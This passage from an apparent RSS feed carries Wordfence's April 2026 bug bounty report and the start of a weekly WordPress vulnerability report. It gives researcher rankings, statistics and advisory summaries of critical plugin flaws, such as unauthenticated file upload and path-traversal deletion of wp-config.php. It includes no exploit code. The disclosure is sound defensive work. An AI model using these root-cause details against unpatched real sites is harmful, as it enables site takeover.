<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5940" target="_blank" rel="noopener">Tin Pham (TF1T)</a></td>
<td>9.80</td>
<td>2</td>
<td>$1,467.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6298" target="_blank" rel="noopener">maru</a></td>
<td>9.80</td>
<td>1</td>
<td>$455.00</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 5 Researchers Based On Total Bounties Earned</h3>
<p>Combining volume with severity, these top earners maximized their impact and rewards through strategic vulnerability research and comprehensive reporting.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by Bounties">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Total Earned</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5743" target="_blank" rel="noopener">h0xilo</a></td>
<td>$6,966.00</td>
<td>6</td>
<td>$1,161.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/2016" target="_blank" rel="noopener">Rafie Muhammad</a></td>
<td>$3,724.00</td>
<td>14</td>
<td>$266.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6487" target="_blank" rel="noopener">lhking</a></td>
<td>$3,323.00</td>
<td>9</td>
<td>$369.22</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5940" target="_blank" rel="noopener">Tin Pham (TF1T)</a></td>
<td>$2,934.00</td>
<td>2</td>
<td>$1,467.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5701" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a></td>
<td>$2,633.00</td>
<td>7</td>
<td>$376.14</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Researchers Promoted to the Next Tier</h3>
<p>Congratulations to the following researchers who have unlocked the next tier! Tier promotions reflect sustained performance, precision, and professionalism in disclosure. Advancing unlocks higher caps, faster reviews, and more visibility. If you’re climbing the ranks, focus on high risk vulnerabilities, keep reports crisp, attach working PoCs, and include mitigation notes vendors can ship quickly.</p>
<div>
<div>
<div>
<h4>Elite Researcher Tier (1337)</h4>
<div>0 researchers advanced to elite status</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f622.png" alt="&#x1f622;" class="wp-smiley"></div>
<div>No Elite Researcher Promotions</div>
<div>No researchers advanced to elite (1337) status this month</div>
</div>
</div>
</div>
<div>
<div>
<h4>Resourceful Researcher Tier</h4>
<div>0 researchers advanced to resourceful status</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f622.png" alt="&#x1f622;" class="wp-smiley"></div>
<div>No Resourceful Researcher Promotions</div>
<div>No researchers advanced to resourceful status this month</div>
</div>
</div>
</div>
</div>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4e3.png" alt="&#x1f4e3;" class="wp-smiley"> Current WordPress Bug Bounty Program Promotions</h2>
<p>As part of our Bug Bounty Program, we regularly launch special promotions that boost bounty rewards and expand research scope. These initiatives are designed to reinforce our mission: delivering the highest quality vulnerability intelligence while encouraging researchers to focus on the discoveries that have the greatest positive impact on the WordPress ecosystem.</p>
<p>At the same time, we also look for promotions that give researchers opportunities to sharpen their skills, take on new challenges, and continue growing into the best of the best in WordPress security research. We often supplement these with educational material for researchers to learn and apply their skills during these promotions.</p>
<p>Below, you’ll find details on all currently active challenges—including timelines and a quick overview of each promotion.</p>
<div><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="&#x274c;" class="wp-smiley"> No promotions currently running.</strong></div>
<p>New to promotions? Start by confirming the software and version range are in scope, validate exploitability on a clean test environment, and submit with clear steps, affected code paths, and impact. Promotions are perfect opportunities for both new and seasoned researchers to maximize earnings while driving faster patch adoption. And remember, you can always check what’s in-scope and out-of-scope by using the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/#rewards" target="_blank" rel="noopener">Wordfence bounty estimator</a>.</p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f526.png" alt="&#x1f526;" class="wp-smiley"> Critical WordPress Software Vulnerability Highlights – April 2026</h2>
<p>These case studies spotlight high-impact vulnerabilities uncovered through the program, why they matter, and how quickly protection rolled out. We share technical detail to help researchers learn, vendors harden code, and users understand why timely updates aren’t optional.</p>
<p>If you maintain a site, update to the patched versions listed and ensure Wordfence is active so you benefit from new firewall coverage as it ships. If you’re a researcher, use these write-ups to inform your hunt: patterns repeat, and past root causes often reappear in adjacent code.</p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> Attackers Actively Exploiting Critical Vulnerability in Ninja Forms – File Upload Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critical-vulnerability-in-ninja-forms-file-upload-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/04/FeaturedImage_Wordfence_322.03.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Ninja Forms – File Upload &lt;= 3.3.26 – Unauthenticated Arbitrary File Upload</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/selim-lanouar" target="_blank" rel="noopener"> Sélim Lanouar (whattheslime)</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$2,145.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Ninja Forms – File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ‘NF_FU_AJAX_Controllers_Uploads::handle_upload’ function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critical-vulnerability-in-ninja-forms-file-upload-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> Attackers Actively Exploiting Critical Vulnerability in Kali Forms Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critical-vulnerability-in-kali-forms-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/04/FeaturedImage_Wordfence_321.02.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Kali Forms &lt;= 2.4.9 – Unauthenticated Remote Code Execution via form_process</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ismailshadow" target="_blank" rel="noopener">ISMAILSHADOW</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$2,145.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Kali Forms plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.4.9 via the ‘form_process’ function. This is due to the ‘prepare_post_data’ function mapping user-supplied keys directly into internal placeholder storage, combined with the use of ‘call_user_func’ on these placeholder values. This makes it possible for unauthenticated attackers to execute code on the server.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critical-vulnerability-in-kali-forms-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 50,000 WordPress Sites affected by Arbitrary File Upload Vulnerability in Ninja Forms – File Upload WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/04/FeaturedImage_Wordfence_310.02.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Ninja Forms – File Upload &lt;= 3.3.26 – Unauthenticated Arbitrary File Upload</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/selim-lanouar" target="_blank" rel="noopener"> Sélim Lanouar (whattheslime)</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$2,145.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Ninja Forms – File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ‘NF_FU_AJAX_Controllers_Uploads::handle_upload’ function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 200,000 WordPress Sites Affected by Arbitrary File Deletion Vulnerability in Perfmatters WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-perfmatters-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/03/FeaturedImage_Wordfence_309.01.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Perfmatters &lt;= 2.5.9.1 – Authenticated (Subscriber+) Arbitrary File Deletion via ‘delete’ Parameter</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$3,726.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Perfmatters plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in all versions up to, and including, 2.5.9.1. This is due to the `PMCS::action_handler()` method processing the `$_GET[‘delete’]` parameter without any sanitization, authorization check, or nonce verification. The unsanitized filename is concatenated with the storage directory path and passed to `unlink()`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server by using `../` path traversal sequences, including `wp-config.php` which would force WordPress into the installation wizard and allow full site takeover.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-perfmatters-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 200,000 WordPress Sites Affected by Arbitrary File Move Vulnerability in MW WP Form WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-arbitrary-file-move-vulnerability-in-mw-wp-form-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/03/FeaturedImage_Wordfence_312.02.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>MW WP Form &lt;= 5.1.0 – Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ismailshadow" target="_blank" rel="noopener"> ISMAILSHADOW</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$3,105.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The MW WP Form plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the ‘generate_user_filepath’ function and the ‘move_temp_file_to_upload_dir’ function in all versions up to, and including, 5.1.0. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). The vulnerability is only exploitable if a file upload field is added to the form and the “Saving inquiry data in database” option is enabled.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-arbitrary-file-move-vulnerability-in-mw-wp-form-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4dd.png" alt="&#x1f4dd;" class="wp-smiley"> Conclusion</h2>
<p>WordPress thrives when researchers, vendors, hosts, and site owners pull in the same direction. By funding high-quality research, coordinating responsible disclosure, and shipping firewall rules at scale, Wordfence turns findings into protection for millions of sites.</p>
<p>If you’re a researcher, <a href="https://www.wordfence.com/threat-intel/researcher-register" target="_blank" rel="noopener">join the program</a> and submit your next report. If you’re a site owner, update early and often, and run <a href="https://www.wordfence.com/products/pricing/" target="_blank" rel="noopener">Wordfence</a> to stay ahead of emerging threats. If you’re a vendor, sign up for the <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">vulnerability management portal</a> to receive real-time notifications when new vulnerabilities are reported in your software. Together, we make the WordPress ecosystem safer.</p>
</div>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/" target="_blank" rel="noopener">Wordfence Bug Bounty Program Monthly Report – April 2026</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (July 20, 2026 to July 26, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-20-2026-to-july-26-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 30 Jul 2026 20:40:22 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-20-2026-to-july-26-2026/</guid>

					<description><![CDATA[Last week, there were 223 vulnerabilities disclosed in 175 WordPress Plugins and 6 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 88 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 223 vulnerabilities disclosed in 175 WordPress Plugins and 6 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 88 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements-pro/admin-and-site-enhancements-ase-pro-890-unauthenticated-remote-code-execution-via-php-code-injection-via-cfgroupinput-repeater-row-key" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) Pro &lt;= 8.9.0 – Unauthenticated Remote Code Execution via PHP Code Injection via cfgroup[input] Repeater Row Key</a></li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">155</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">68</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">172</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">42</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">9</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">70</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">59</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">25</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Improper Authentication</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Improper Input Validation</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Incorrect Privilege Assignment</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Relative Path Traversal</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">49</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">28</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e4a8b174c9f284d94094cf7722e1ec31.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4a8b174c9f284d94094cf7722e1ec31"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener">Asaf Mozes</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener">ed32.dll</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
